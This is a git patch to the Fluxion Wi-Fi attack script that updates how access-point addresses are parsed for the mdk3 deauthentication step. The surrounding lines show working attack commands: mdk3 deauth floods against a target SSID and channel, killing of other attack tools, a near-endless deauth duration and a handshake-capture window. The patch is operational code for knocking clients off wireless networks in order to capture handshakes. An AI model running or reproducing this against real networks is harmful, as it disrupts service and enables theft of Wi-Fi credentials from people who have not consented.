From 74510991c4aaec539ac91a3e641f07d6477a0382 Mon Sep 17 00:00:00 2001 From: STRSHR Date: Thu, 20 Oct 2016 08:23:23 +0300 Subject: [PATCH] update mdk3 parsing --- fluxion | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fluxion b/fluxion index b422ae6..a4ef344 100755 --- a/fluxion +++ b/fluxion @@ -29,7 +29,7 @@ ipNmap=`ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*) # Deauth duration during handshake capture # oo DEAUTHTIME="9999999999999" -revision=73 +revision=74 version=0.23 IP=192.168.1.1 RANG_IP=$(echo $IP | cut -d "." -f 1,2,3) @@ -4369,7 +4369,7 @@ function attack { killall aireplay-ng &> $flux_output_device killall mdk3 &> $flux_output_device - strings $DUMP_PATH/dump-02.csv | cut -d "," -f1,14 | grep -h "$Host_SSID" | cut -d "," -f1 | awk '{if (NR!=1) {print}}' >$DUMP_PATH/mdk3.txt + echo "$(strings $DUMP_PATH/dump-02.csv | grep -h "$Host_SSID" | awk -F ',' '{print $1}')" >$DUMP_PATH/mdk3.txt xterm $HOLD $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauth all [mdk3] $Host_SSID" -e mdk3 $WIFI_MONITOR d -b $DUMP_PATH/mdk3.txt -c $Host_CHAN & xterm -hold $TOPRIGHT -title "Wifi Information" -e $DUMP_PATH/handcheck &